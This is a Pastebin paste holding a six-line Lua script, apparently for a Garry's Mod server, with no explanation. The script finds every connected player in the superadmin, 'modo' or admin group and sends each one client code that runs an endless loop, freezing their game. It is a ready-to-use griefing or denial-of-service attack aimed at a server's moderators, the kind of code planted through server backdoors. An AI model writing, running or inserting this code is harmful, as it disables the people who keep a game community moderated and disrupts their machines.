Advertisement
Guest User

Untitled

a guest
Jul 18th, 2019
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. for i=1, #player.GetHumans() do
  2. local ply = player.GetHumans()[i]
  3. if ply:GetUserGroup() == "superadmin" or ply:GetUserGroup() == "modo" or ply:GetUserGroup() == "admin" then
  4. ply:SendLua([==[while true do end]==])
  5. end
  6. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement